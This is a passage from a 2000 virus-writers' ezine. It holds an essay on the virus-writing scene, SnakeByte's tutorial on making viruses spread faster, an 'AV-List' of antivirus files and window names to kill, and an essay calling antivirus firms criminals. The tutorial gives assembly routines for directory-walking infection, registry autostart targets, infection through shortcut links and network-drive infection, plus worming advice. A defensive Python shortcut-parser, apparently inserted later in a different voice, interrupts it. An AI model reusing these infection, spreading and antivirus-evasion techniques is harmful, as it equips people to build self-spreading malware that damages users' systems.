Here again, examples are numerous. Was it one year ago that a new, mainly English-speaking group appeared, totally over-hyped, with every newcomer wanting to join? They did nothing, most of their members were plain unknowns, but you couldn't miss their presence on IRC. Everybody laughed at them, but nobody told them directly that they were totally ridiculous, for example with their "public relations department" (more on that later) and other laughable things. Yet again, IRC was their main "scene" participation. Where is the code? I think this group has now returned to the dust it appeared from, but who really cares? I also remember the ridiculous, but finally rewarded, ass-licking efforts of a coder (who is a cool and very intelligent guy, but anyway) to join a high-profile group. Once he was at last able to glue this well-known tag to his nickname, he had reached his goal, and he just disappeared. He never coded anything else.

People sometimes tell me: "being a member of a group is a good way to stay motivated". If you need to be motivated, or gently forced, to be a vxer, it would be a better idea to spend your time fishing, or doing something you don't need to be motivated for. Forget for a moment the question "how to be a vxer" (and basically, if you still don't know the answer, it is time to return to your stamp collection), and ask yourself the more important question: why do you want to be a vxer? For the hype? Because it is cool? Because people will fear you? Because you want to satisfy your ego? Because you want to impress your girlfriend or your mom? Because you are looking for on-line friends? Or just because you are curious, you want to code and learn something new?

- I'm soooo afraid to talk with normal people!

Another strong criticism, and a clear sign of immaturity, that comes to mind: most vxers are not able to argue with people from the two other sides of the virus triangle, anti-virus people and infected users. There is a good place for that: alt.comp.virus on Usenet. Nowadays it is mainly an anti-virus group, unfortunately, with some uninteresting parrots, but anyway, it is the only place where you can directly and publicly discuss with members of the anti-virus industry. They have their share of big hypocrisy, ego and closed minds, of course, but I am not talking about them right now. These guys, and some of them are very smart, have a lot of tough arguments to oppose to us. The easy way, used by most Vx people, is not to participate in this group and to avoid any kind of discussion, or just to pop up there once, insult everybody, and jump back into their hole. What does that mean? Easy: virus writers are not open-minded enough to quietly discuss with people who oppose them, to listen and to contradict the opposing arguments. Or maybe they are not smart and mature enough to engage in an adult discussion. It is kind of funny, because Vx often ask people to be open-minded about virus-writing activities. Instead of bashing the much-beloved Nick Fitzgerald on IRC, where he is not, what about trying to argue against him publicly in the newsgroup? Of course, it may be a bit tougher, due to his rhetorical skills.

Some Vx people told me that they don't participate in this forum because it is mainly an AV group. Think a bit more about this argument. It is kind of recursive, a bit like an infinite loop, to use coding terms. It looks like a self-fulfilling prophecy. In other words, it is plain stupid.

- Ego scene

I could say more about the grossly over-inflated ego of most of us (me included), but my hour of reflection is over. Anyway, just as an example, I always find funny the dramatic, emphatic farewells of people leaving the "scene", although they generally never produced anything noticeable, texts apparently always written with some emotion. If you want to leave, just disappear silently and return to where you came from, nobody will notice anyway; keep in contact if you want, and don't bother people with your ridiculous tears in the eyes and other "official" retirement. The day you decided to become a vxer, you didn't issue a public statement "People, listen to me, today I officially join the Vx scene!". So do the same when you leave. Every other way to stop is just a desperate and childish call for attention, from people who didn't receive enough of it for their production during their career, an ultimate attempt to turn people's eyes in their direction for one or two minutes. This impression is even worse when the guy gives as a reason "there is too much shit in the scene these days", or something like that. That clearly means that they were not here to code and to learn. They probably needed to be accepted in some community, any community, to find some other people to talk with. What about the Barbie doll collector scene? Now that I think about it, the ultimate case of lameness is the guy who declares everywhere that he quits, and is actually still around. Not even able to follow his own words.

Another example, linked to the group problem. It seems that some people create a group for the sole excitement of becoming a boss, being able to recruit people, command them, and fire them if needed. People always need to find other people even lamer than themselves in order to feel better; it is an eternal law of human beings. It is the same mechanism of false, artificial power as on IRC. It is "my" group, "my" board, "my" zine, "my" channel, and there I am the king. More generally, a rigid hierarchy in a group is a clear signal of lameness. Newcomers, please notice how the best groups around have no hierarchy at all. Maybe one guy who centralises the material for the zine, and that's all. Every attempt to mimic the real world (a company, for example, with different departments) is condemned to be considered extremely lame and poorly productive; and I am not even talking about the irony of seeing newcomers to the underground very quickly trying to imitate the mechanisms of the normal world. Didn't you come to the Vx world in part because it looked different?

That is why everybody laughs when a group reaches this peak of extreme ridiculousness, a "Public Relations" department. It is clearly a way of admitting "we have nothing to say, but anyway, there is a guy in charge of that". It is a way to show everybody your navel-gazing, egocentric view of the scene, because you think every journalist around is going to be interested in your new group, you will be submerged by interview requests, users will ask you about your viruses, you will make the front page of the New York Times. In your dreams.

- Delicate conclusion

I sometimes think that the Vx scene is mainly composed of boring IRC teens who don't really know what life (I mean real life) is all about, who are not interested in learning, but in posing as some elite lordz of Darkness. It may be partially true or partially wrong, depending on how you look at it. Anyway, I don't really care. A minority of people are interesting enough, as human beings, or coders, or both, and that is the only important thing, at least for me. I don't care about all the microscopic IRC wars, the anecdotal group fights, the childish aggressiveness. Maybe that is because I am a bit old, but I think I have learned how to filter important things from the background noise. And not just in the Vx world. Try to do the same, you will see, life is easier.

- Epilogue

People involved in the virus community (I don't like the word "scene": this is not a theatre, and there is nobody watching us, another navel-gazing deformation of reality, even in the terms used) always say that it is getting worse with the passing years: more and more script kiddies and fewer and fewer die-hard asm coders who can spend six hours on a routine just to optimise it by saving two bytes. I don't think that is true. The problem is that people cannot separate their personal history from the global picture (and that is not limited to the Vx world, of course). If you try to look at it with some distance, you will see that the Vx community looks the same as it did five or ten years ago. Not in terms of the techniques used, of course, but in terms of personalities. New people pop in, old people quit, in an eternal cycle. In these two extreme populations, and in the large group of active vxers which sits in the middle, the proportion between posers who are just driven by an ego trip (ph33r M3!) and the really interesting guys who want to discover new techniques or possibilities, even through a long learning process, yes, this proportion always stays the same through the years. You have stupid old-schoolers and stupid newbies who think they are Elvis, and you have interesting old-schoolers and interesting newbies who want to learn, always. If you are reading this and you think you are part of the "scene", just think about which category you fit best. But be aware that the image you have of yourself may not be the image your Vx colleagues have of you. If you are not satisfied with it, think about what you can do to change it and maybe gain some respect. I am not talking just about improving your technical skills. Some people try to be creative with their limited knowledge (me, for example), others run websites, publish useful databases, are active collectors, help newcomers by writing tutorials, code things other than pure viruses, whatever. You can, at last, improve your behaviour when interacting with other people. In other words: try to be mature.

I will stop here and return to my cave. Hope this helps.

Spanska - 20 September 2000

PS: Post a message in alt.comp.virus if you want to talk about that - I have no mail.


[copyquedalle: steal this text, modify it, sign it with your name, wipe your ass with it, i don't fucking care]


Faster Spreading, or what to include in your virus to make it spread more effectively

by SnakeByte [[email protected]]

Here we go. Please notice that it is illegal to spread viruses; all this information is completely theoretical, or for testing purposes in a controlled environment.

I have only written one Windows virus, so you will see just a few lines of code here (interesting ones, I think, but maybe not very optimised ;)

The task of a virus is to spread (the payload is just a side-effect). So we need some tricks (besides infection *g*) to make our virus spread as fast as possible.

Ok, when a virus arrives on a clean system it will infect some files, sure .. ;) But if something goes wrong, we just get some files in the current directory, and the victim deletes them because he does not like the infected app.. :(

Not very good, so what can we do to avoid this situation?

Here are 6 ideas of what we can do:

1.) Infect as many file types as possible
2.) Try to drop over archives
3.) Parse directories
4.) Use the Registry
5.) Follow links
6.) Worming

Ok, let's take a closer look at each of these methods:

1.) Infect as many file-types as possible.

If you are a macro coder, you should try to infect as many document types that support macros as possible (DOC, CDR, DOT, PPT, XLS ..). Same for the assembler coders: there are a lot of file formats which can be infected in Win32: PE-EXE, SCR (same as PE-EXE), DLL, HLP and VXD. Maybe you should try to code a hybrid which is able to infect binaries on the one hand and macro documents on the other; this will offer you a much higher chance of finding files to infect. VDat has a description of how to infect most file types. I think adding 200-400 bytes to your virus to be able to infect another type is a very good deal. The more files you infect, the more likely your virus gets around.

2.) Try to drop over archives

Nowadays nearly every file you download somewhere, or get sent by someone, is zipped or packed with another archiver (RAR, ACE ..). It is possible to infect the files inside the archives too. It also offers you some protection against AV programs, because AVP, for example, does not scan archives by default. Read Unknown Mnemonix's tutorials about archive infection for more information on how to do this. So if you infect an archive you achieve two goals (stupid sentence ;P): you might not get detected, and it is possible that someone uploads the archive to a website and your virus gets lots of hits..

3.) Parse directories

Ok, now we infect a lot of files, but they are all still in the same directory, so we need to change and parse directories. What we should nearly always infect are the Windows and System directories, because they contain a lot of files which are used very often. Use the GetWindowsDirectory and GetSystemDirectory APIs to retrieve their names. Then you should parse directories to find more files to infect. Otherwise we would have infected the current, the win and the sys directory, but nothing else, which is not very useful (how often do you DCC a friend your calc.exe? *g*) There are two ways of parsing directories: towards the root (like cd.. in DOS), where you would normally not find a lot of files, or down into the subdirectories, which is the recommended way. This can be simply done with a FindFirstFile / FindNextFile loop. The current directory is assumed to be the root of one of the drives. FindFirstFileProc and FindNextFileProc are procedures that call the matching APIs (I think you'll use them several times elsewhere too). The RandomNR procedure just generates a random number in dx.

************************

ParseFolder:
    call    InfectCurDir                    ; infect the current directory
    cmp     [ebp+InfCounter], 0             ; check if we reached the number of files we want to infect
    jbe     EndParsing                      ; we infected enough? ok, leave!

    lea     esi, [ebp+Folders]
    call    FindFirstFileProc
    inc     eax
    jz      EndParsing                      ; if there are no directories we return
    dec     eax                             ; otherwise we save the handle

GetOtherDir:                                ; first of all we check if this
                                            ; is a valid directory
    mov     eax, dword ptr [ebp+WFD_dwFileAttributes]
    and     eax, 10h                        ; FILE_ATTRIBUTE_DIRECTORY; if not set we get the next one
    jz      NoThisOne

    lea     esi, [ebp+WFD_szFileName]
    cmp     byte ptr [esi], '.'             ; we will not parse into the . or .. directories
    je      NoThisOne

    call    RandomNR                        ; generate a random number; if it is 1
    dec     edx                             ; we infect the directory, otherwise
                                            ; we go on searching
    jz      ParseNewDir                     ; we take this directory

NoThisOne:

    call    FindNextFileProc                ; find the next directory
    test    eax, eax
    jnz     GetOtherDir

EndParseDir2:                               ; we close the search handle
    mov     eax, dword ptr [ebp+FindHandle]
    push    eax
    call    dword ptr [ebp+XFindClose]

EndParsing:                                 ; we just return
    ret

ParseNewDir:                                ; we got a directory, let's change to it
                                            ; and infect it.. *eg*

    ; close the find handle
    mov     eax, dword ptr [ebp+FindHandle]
    push    eax
    call    dword ptr [ebp+XFindClose]

    ; set the new directory
    lea     esi, [ebp+WFD_szFileName]
    push    esi
    call    dword ptr [ebp+XSetCurrentDirectoryA]

    jmp     ParseFolder                     ; parse it again!

Folders db '*.',0

************************

4.) Use the Registry

The Windows registry also offers us a lot of information about which files or directories we should infect to be sure that our virus gets activated again and does not sleep inside some never-used files. You need to load an additional DLL in your virus, but I think this is ok. If you can't load the DLL, just jump over the registry routines and infect fewer files. I think you all know what the Windows registry is, or? For those who don't: the registry replaces the old ini files which were used in older versions of Windows (3.1). The registry information is stored in User.dat and System.dat. To view or change the registry use 'regedit.exe', which is delivered with every version of Windows.

The following APIs are necessary to access the registry; they are all inside ADVAPI32.DLL!

RegOpenKeyEx    - Opens a registry key
RegCloseKey     - Closes an open key
RegCreateKey    - Creates a key
RegEnumKeyEx    - Enumerates subkeys
RegQueryValueEx - Retrieves a value
RegEnumValue    - Enumerates values

Ok, let's see some source on how to get a value from the registry. This little piece of code gets the Start Menu folder:

************************

    lea     esi, RegHandle
    push    esi                             ; phkResult: receives the opened key handle
    push    001F0000h                       ; complete access (KEY_ALL_ACCESS)
    push    0h                              ; reserved
    lea     esi, SubKey
    push    esi                             ; lpSubKey
    push    80000003h                       ; HKEY_USERS
    call    RegOpenKeyExA

    test    eax, eax                        ; if we failed opening the key, we return
    jnz     WeFailed

    ; let's get the value
    lea     esi, BufferSize
    push    esi                             ; lpcbData: in = buffer size, out = bytes returned
    lea     esi, Buffer
    push    esi                             ; lpData
    lea     esi, ValueType
    push    esi                             ; lpType: type of value
    push    0                               ; reserved
    lea     esi, Value
    push    esi                             ; lpValueName
    mov     eax, RegHandle
    push    eax                             ; reg-key handle
    call    RegQueryValueExA

    mov     eax, dword ptr [RegHandle]
    push    eax
    call    RegCloseKey

WeFailed:

    ret

SubKey     db '.Default\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders',0
Value      db 'Start Menu',0
ValueType  dd 0h                            ; type of registry value
BufferSize dd 7Fh                           ; size of buffer
Buffer     db 7fh dup (0)
RegHandle  dd 0                             ; opened key handle (declaration missing in the original listing)

************************

But what can we use the registry for? Ok, let's see some interesting values:

These keys hold the autostarted files:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce

Here are the paths of all installed apps; what about parsing this key? ;)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths

Several standard directories:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup

Shared files (infect them "two for the price of one" *g*):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDLLs

Registered help files (if your virus infects them, here you get a whole bunch of them):
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Help

Computer network name (nice value for slow poly):
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ComputerName\ComputerName

A list of installed files (vxd, exe, dll, hlp, pif, ..):
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\InstalledFiles

Page 26: EZine - Coderz #1

5.) Follow Links

Windows uses LNK files to create shortcuts to often-used files, so you don't need to copy an 8 MB file to your desktop. If you find such a link, you should check if it points to a file you are able to infect; if so.. don't wait and drop your code over it. This becomes very useful if you parse the Start Menu or the desktop *eg*

Here is some example code from my Win32.DDoS for how to do this; it does not work with NT LNK files :( There is also an API we can use for this, but I never figured it out; anyway, this is not that much code, so we can include it.

I assume you retrieved the LNK file with the help of FindFirstFile / FindNextFile and that the information is stored in the WIN32_FIND_DATA structure. I also assume that the file is mapped and the base address is in MapAddress.

************************
                                            ; first of all, we check for the file
                                            ; mark: it is a single 'L' followed by a zero

    mov     esi, dword ptr [ebp+MapAddress]
    cmp     word ptr [esi], 'L'             ; check for the sign ('L',0 = start of the 4Ch header size)
    jne     NoLNK                           ; if it is no LNK file we close it

                                            ; let's make a check on the file size. The original
                                            ; comment says "bigger than 1 MB", but 0400h is 1 KB
                                            ; (1 MB would be 100000h); the constant is kept as written

    cmp     dword ptr [ebp+WFD_nFileSizeLow], 0400h
    ja      NoLNK

                                            ; get the start address in esi, and the size

    mov     esi, dword ptr [ebp+MapAddress]
    mov     ecx, dword ptr [ebp+WFD_nFileSizeLow]
    xor     edx, edx
    add     esi, ecx                        ; we start checking at the end of the file
    dec     esi                             ; last byte of the mapping (the original listing started
                                            ; one byte past the end and never looked at byte 0)
                                            ; for a valid filename in it
CheckLoop:
    cmp     byte ptr [esi], 3ah             ; we detect a filename by the colon (3ah = ':')
    jne     LNKSearch                       ; after the drive letter, for example C:\whatever\blah.exe;
                                            ; we search for the ':'

    inc     edx                             ; there are two colons when checking from the end of
    cmp     edx, 2d                         ; the LNK; we need the 2nd one. The first ':' is inside
    je      PointsDetected                  ; the path (without filename), so we skip it

LNKSearch:                                  ; go on searching
    dec     esi                             ; we search until we found the colon or
    loop    CheckLoop                       ; searched the entire file (size in ecx);
                                            ; I don't want to create a SEH .. ;)
                                            ; if we end here, we did not find the two colons.. :(
NoLNK:

    ret                                     ; return to search more files...

PointsDetected:                             ; we found the drive (the colon ... *g*)
                                            ; esi points to it, now we need to check
                                            ; the name..

    cmp     byte ptr [esi+1], 0h            ; check if we got an entire path or just a
    je      NoLNK                           ; single drive; this can happen sometimes with
                                            ; NT or 2k shortcut files, so we better avoid them

PointsDetected2:                            ; now we search for the start of the name
    dec     esi                             ; by searching for a zero
    cmp     byte ptr [esi], 0h
    je      NameDetected

    loop    PointsDetected2                 ; ecx still takes care that we don't
                                            ; search too far..

    jmp     NoLNK                           ; nothing found? return..

NameDetected:                               ; ok, esi now points to the name of the file
    inc     esi                             ; you can now open this file and check if it is
                                            ; something you are able to infect;
                                            ; it's just that easy, but very effective, if you
                                            ; do this in the right folders,.. ;)
************************
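The backwards scan for a ':' above is a guess at where the target path sits, and the text admits it gives up on NT/2000 shortcuts. The path actually lives at documented offsets inside the LinkInfo block of the Shell Link format ([MS-SHLLINK]), so the same question ("what does this shortcut launch?") can be answered exactly, which is what you want when triaging a Start Menu or startup folder for suspicious links. The following is an added example of mine, not code from the zine or from Win32.DDoS: it parses the 76-byte header, skips the optional ID list, and reads the local or UNC target out of LinkInfo. The sample links are constructed in memory (not real Windows output), the field offsets and flag values are taken from the public spec, and joining a UNC NetName to the path suffix with a backslash is my assumption.

```python
"""Read the target path out of a Windows .lnk (Shell Link) file.

Added example; not code from the zine or from Win32.DDoS. Layout per the
public [MS-SHLLINK] spec: 76-byte ShellLinkHeader, optional LinkTargetIDList,
then LinkInfo holding LocalBasePath / CommonNetworkRelativeLink and
CommonPathSuffix. The sample links are constructed in memory (not real
Windows output) so the script runs offline.
"""
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
HAS_LINK_TARGET_ID_LIST = 0x01          # LinkFlags bits (header offset 0x14)
HAS_LINK_INFO = 0x02
VOLUME_ID_AND_LOCAL_BASE_PATH = 0x01    # LinkInfoFlags bits
COMMON_NETWORK_RELATIVE_LINK = 0x02


def is_shell_link(data):
    """Fixed-header check: HeaderSize 0x4C ('L',0,0,0) plus the link CLSID."""
    return len(data) >= LNK_HEADER_SIZE and data[:4] == b"L\x00\x00\x00" and data[4:20] == LNK_CLSID


def _cstr(data, off):
    """NUL-terminated ANSI string at off; raises ValueError if the NUL is missing."""
    return data[off:data.index(b"\x00", off)].decode("cp1252")


def lnk_target(data):
    """Return the path a shell link points at, or None if it carries no LinkInfo."""
    if not is_shell_link(data):
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:         # skip the PIDL, not needed for the path
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if not flags & HAS_LINK_INFO:
        return None                              # e.g. a link to a shell namespace object
    li = pos
    (li_size, li_hdr_size, li_flags, _vol_off,
     base_off, net_off, suffix_off) = struct.unpack_from("<7I", data, li)
    if li_hdr_size < 0x1C or li + li_size > len(data):
        raise ValueError("truncated LinkInfo")
    if li_flags & VOLUME_ID_AND_LOCAL_BASE_PATH:
        return _cstr(data, li + base_off) + _cstr(data, li + suffix_off)
    if li_flags & COMMON_NETWORK_RELATIVE_LINK:
        cnrl = li + net_off
        net_name_off = struct.unpack_from("<I", data, cnrl + 8)[0]
        # NetName is the share root; joining it to the suffix with '\' is my assumption
        return _cstr(data, cnrl + net_name_off) + "\\" + _cstr(data, li + suffix_off)
    return None


def build_lnk(local_path=None, unc_share=None, suffix="", with_idlist=False):
    """Construct a minimal .lnk in memory (constructed test input, not a real file).

    Set exactly one of local_path / unc_share. Real links also carry
    timestamps, a PIDL and string data; the parser above does not need them.
    """
    flags = HAS_LINK_INFO | (HAS_LINK_TARGET_ID_LIST if with_idlist else 0)
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID, flags).ljust(LNK_HEADER_SIZE, b"\x00")
    idlist = struct.pack("<H", 2) + b"\x00\x00" if with_idlist else b""   # empty list: TerminalID only
    suffix_b = suffix.encode("cp1252") + b"\x00"
    if local_path is not None:
        # VolumeID: size, DriveType 3 (fixed), serial, VolumeLabelOffset 0x10, empty label
        vol = struct.pack("<4I", 0x11, 3, 0x12345678, 0x10) + b"\x00"
        base = local_path.encode("cp1252") + b"\x00"
        body = vol + base + suffix_b
        offs = (0x1C, 0x1C + len(vol), 0, 0x1C + len(vol) + len(base))
        li_flags = VOLUME_ID_AND_LOCAL_BASE_PATH
    else:
        # CommonNetworkRelativeLink: size, flags (ValidNetType), NetNameOffset 0x14,
        # DeviceNameOffset 0, NetworkProviderType 0x20000 (WNNC_NET_LANMAN), NetName
        name = unc_share.encode("cp1252") + b"\x00"
        cnrl = struct.pack("<5I", 0x14 + len(name), 0x2, 0x14, 0, 0x20000) + name
        body = cnrl + suffix_b
        offs = (0, 0, 0x1C, 0x1C + len(cnrl))
        li_flags = COMMON_NETWORK_RELATIVE_LINK
    # LinkInfo: size, header size 0x1C, flags, then VolumeID / LocalBasePath /
    # CommonNetworkRelativeLink / CommonPathSuffix offsets (relative to LinkInfo)
    link_info = struct.pack("<7I", 0x1C + len(body), 0x1C, li_flags, *offs) + body
    return header + idlist + link_info


if __name__ == "__main__":
    samples = [build_lnk(local_path="C:\\", suffix="Windows\\calc.exe"),
               build_lnk(unc_share="\\\\fileserver\\apps", suffix="setup\\setup.exe", with_idlist=True)]
    for s in samples:
        print(lnk_target(s))   # C:\Windows\calc.exe  then  \\fileserver\apps\setup\setup.exe
```

On a live system the same function takes `Path(folder).rglob("*.lnk")` with `read_bytes()` as input; a link whose target resolves to a user-writable directory, a network share, or a path that differs from what its icon suggests is the kind of thing this surfaces. Links whose LinkInfo is absent (shell-namespace targets) come back as None rather than as a guessed path.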

6.) Worming

To make sure you don't stay on a single computer you should try to spread over networks. One way is IRC worms, which send your virus to other chatting people. To my mind this is the easiest way to worm around. Another way is to check all drives, and if you have access to a network drive, infect some files there.

************************

    push    offset Buffer                   ; offset of the buffer
    push    60h                             ; buffer length
    call    GetLogicalDriveStrings

    cmp     eax, 0                          ; did we fail?
    je      StopThis

    lea     esi, Buffer

WhatDrive:
    push    esi
    call    GetDriveType
    cmp     eax, DRIVE_REMOTE               ; we got a network drive
    jne     NoNetwork

                                            ; esi still contains the offset of
                                            ; the root dir on the drive
    call    infectDrive                     ; so we infect it.. ;P

NoNetwork:
    call    GetNextZero                     ; place esi after the next zero
                                            ; (searching from esi onwards)
    cmp     byte ptr [esi], 0
    jne     WhatDrive                       ; if we searched all drives we
                                            ; end here, otherwise we check the type
StopThis:
    ret

Buffer db 60h dup (?)                       ; I don't know that many ppl with 20+
                                            ; drives, so this buffer size should be
                                            ; big enough ;)

************************

Another way is, like the 911 dialer does, to scan IP ranges while the user is online for NetBus PCs without password protection. If you have access, just upload your virus ;) Finally, you can worm with the help of e-mail: infect a program and send it around with Visual Basic Script or with the MAPI commands. This is maybe the fastest and most efficient way of spreading, because the snowball effect is very big. But if you use VBS and Outlook, please keep in mind that it is bad enough that your virus only spreads on one OS; if it also relies on two front-ends (OE and the VB Scripting Host) it becomes even worse ;)

Hope this little text helps at least some people. I enjoyed writing it, and I hope you enjoyed reading it... ;)

cu SnakeByte


AV-List 13.07.2000 (by SnakeByte [[email protected]])

What is the problem when using anti-AV tricks in a virus? Most of those you find in tutorials are simply outdated (think of the f-prot loop trick, which is still used ;). But in Windows you have more possibilities to get rid of the AVs: you can stop the execution of files (under Win9x and 2k), you can delete files, you can prevent files from being executed (if you're in ring 0) and you can close the windows of other applications. So in this little list you find all you need for this.

I looked for such a list because I wanted to know which files are used by AVs and which windows we should close to disable them! But I found none. Lucky for you: now I have a CD in my hands with several shareware AVs, and I collected several others on the net (god I love this flat rate ;). So I took some spare time and made this little listing.

I only have Win95, so I can only give information about the Win9x versions. If you have another version of a program listed here installed, or information about a program which is not listed here, please contact me, so I can expand this list and keep it current.

**************************************************************
Anti-Viral Toolkit Pro (AVP)

Files:
  *.avc          Virus database (the normal EXE files seem to start the _ ones)
  _avp32.exe     AVP antiviral scanner shell
  _avpcc.exe     AVP Control Centre application
  _avpm.exe      AVP Monitor
  avp32.exe      AVP Scanner (main file)
  avpcc.exe      AVP Control Centre application
  avpm.exe       AVP Monitor
  avpdos32.exe   AVP Scanner for DOS
  avptc32.exe    AVP Scanner for DOS
  exec.exe       unknown
  avpupd.exe     AVP Update (leeches new *.avc files)

Window names:
  AVP Monitor
  AntiViral Toolkit Pro
  AVP Updates

**************************************************************
AntiVir 9x

Files:
  Antivir.vdf    Virus database
  AVE32.exe      Scanner (DOS)
  Avgctrl.exe    Monitor
  Avnt.exe       Scanner (DOS)
  Avrep32.exe    Report viewer
  AVSCHED32.exe  Scan scheduler
  AVWIN95.exe    Scanner
  Avwupd32.exe   Update

Window names:
  H+BEDV AntiVir Guard/9x
  AVWUPD32

**************************************************************
Dr. Solomon Virus Scan

Files:
  scan.dat       Virus database (assumed)
  AVConsol.exe   Scheduler
  Bootscan.exe   MBR scanner (DOS)
  ECEngine.exe   Download engine
  FindViru.exe   Scanner (DOS)
  scan32.exe     Scanner
  scrscan.exe    Screensaver + scanner
  VSCAN40.exe    Desktop for the scanner
  vshwin32.exe   Monitor
  Webscanx.exe   Web scanner

Window names:
  vsstat
  Avconsol
  Webscanx
  Vshwin

**************************************************************
F-Prot for Windows

Files:
  *.def          Virus database
  Expert.exe     Help & information (DOS)
  FP-Win.exe     Scanner
  f-stopw.exe    Monitor
  Vir-help.exe   Help file (DOS)

Window names:
  FP-WIN
  F-PROT für Windows (German version)
  F-STOPW Version 5.06c

**************************************************************
F-Prot 3.07B

Files:
  *.def          Virus database
  F-prot.exe     Scanner (DOS)

**************************************************************
F-Secure Anti-Virus for Windows 95

Files:
  *.avc          Virus database (uses the same as AVP!)
  DVP95.exe      F-Secure Gatekeeper
  DVP95_0.exe    F-Secure Gatekeeper
  F-agnt95.exe   F-Agent
  F-prot95.exe   F-Secure Anti-Virus launcher

Window names:
  F-Secure Anti-Virus for Windows 95
  F-Secure Anti-Virus
  F-agnt95
  Dvp95

**************************************************************
G-Data AntiVirenKit (German program)

Files:
  *.avc          Virus database (same as AVP!)
  AvkServ.exe    Scan server
  AckWin32.exe   Scanner
  notstart.exe   Creates boot disks

Window names:
  AntiVirenKit 9

**************************************************************
InoculateIT Personal Edition

Files:
  Vet95.exe      Scanner
  VetTray.exe    Monitor
  AutoDown.exe   Update
  Rescue.exe     DOS scanner

Window names:
  InoculateIT Personal Edition
  InoculateIT Real-Time Protection Status
  vettray
  AutoDownload

**************************************************************
Norman Virus Control Win 9x

Files:
  Claw95.exe     Monitor
  Claw95cf.exe   Configures the monitor
  Normist.exe    Smart behaviour blocker
  Nvc95.exe      Scanner
  Nupgrade.exe   Internet upgrade
  NVCbin.def     Virus database
  NVCMacro.def   Virus database

Window names:
  Norman Virus Control for Windows 95/98
  Cat's Claw v4.80

**************************************************************
Norton Anti Virus (NAV)

Files:
  navapw32.exe   Monitor
  NavLu32.exe    Update
  Navw32.exe     Scanner

Window names:
  navpw32
  Norton AntiVirus


**************************************************************
Sophos Anti-Virus for Win95

Files:
  VDL.dat        Virus database (assumed)
  Sweep95.exe    Scanner

Window names:
  Sophos Anti-Virus - SWEEP

**************************************************************
Trend PC-Cillin 98

Files:
  IOMon98.exe    Monitor
  PCCWin98.exe   Scanner

Window names:
  Trend PC-cillin 98
  Iomon98

**************************************************************
RAV 7

Files:
  *.vdm          Virus database
  Jedi.exe       Scan scheduler
  Monitor.exe    Monitor
  rav7win.exe    Scanner
  rav7.exe       Scanner (DOS)

##############################################################

Page 33: EZine - Coderz #1

Are Anti-Virus Companies Criminals?

SnakeByte

Hi, maybe you are wondering about this headline, but I will tell you some facts which brought me to this question ;)

The first thing is that in several countries there is a law against the ownership of viral source codes and binaries. But this also means that it is forbidden to share these things. What do AVers do? They share their files so they are all able to include common viruses in their databases. In addition to this, they have a lot of viral binaries and disassemblies in their labs to analyze viruses.

The next fact is not related to a country-specific law but to international copyright. Most of the software for MS-DOS and Windows (which are the favourite platforms for viruses) is commercial. What does this mean? You have to pay for the software you use. If you copy it completely or in part without paying for the code, you break international copyright law. Heh, what do Kaspersky and the others ask me for? I shall send them files which I suspect to be infected? I can't believe this, they ask me to commit a crime! I don't know how other countries handle this, but here in Germany, if you make another person commit a crime it is nearly as bad as committing the crime yourself.

The last time I installed something commercial on my PC, I was so bored that I read the disclaimer (you know, the window with lots of text you normally only see for a moment because you press >next< right away). I was surprised when I saw the little paragraph about reverse engineering. If you own this program, you agree to the terms that you will never, ever reverse this program. (If you don't own the program you break the copyright I talked about a few lines above *g*.) Heh, how do the anti-virus researchers analyze viruses? They reverse the virus to gain knowledge about how it works. Whoah, to do this they also need to disassemble the infected program. Another law they break. I really don't think that they just start the file to infect some goats; if they did, they would risk new hardware attacks destroying their systems ;)

Another thing is that several anti-virus companies have started to work on scanners which run on mail servers to stop outgoing viruses. The mail will not be delivered. Since most virus scanners can scan compressed files and so on, there is no easy way for a normal user to send a virus to his favourite AV company if the server he uses runs one of these scanners and the scanner has the virus in its database. OK, why is this so criminal? By this they exclude smaller AV companies from the market. I myself write a simple, free anti-trojan tool. How should I receive submissions from people who want to support my work? It is impossible, and therefore I can no longer work on my product. In this way they use their near-monopoly position to get rid of competitors. This is illegal, as you can see in the current proceedings against Microsoft.

What if we consider viruses to be art? In a way the author created something unique, which may be considered an artwork like a book or a painting (if you look at abstract art, nearly everything may be considered art *g*). What about the destruction of art? Nearly everywhere this is illegal or at least against ethics (just think about the burning of books by the Germans during WW2). So this might be another crime they commit.

What if we placed a copyright notice in our software? Something like: "You can freely distribute this program as long as you do not change anything. Disassembling and forwarding to the anti-virus community is forbidden. This program is protected by international law. It is only meant for analyzing artificial intelligence in controlled environments. It is also strictly forbidden to place this program in a non-controlled environment and release it into the wild... bla bla". Just use their laws to forbid them from analysing our creations. If you see the virus in an AV database you know they have broken this law and you can take them to court... ;)

OK Mr. Kaspersky, go and get some good lawyers ;)


Some Tipz & trix for Win2k

1. Introduction

I just wanted to write an article about NTFS5, but I am reading a lot of documentation about Win2k and I found many functions and sequences there that could be very useful for us virus coders. So I decided to write some tipz and trix that anybody could use. I hope I succeeded. By the way, it's my first article written in English, so please be patient. My English sucks, so if you don't know what something means, just contact me. And now we can begin ...

2. NTFS5

I think you all expected this :) And I also read on virus.cyberspace.sk that an English version of my article for Igi is requested. I won't translate exactly what I wrote there, because it wasn't for coders. This will be :)

2.1. Streams

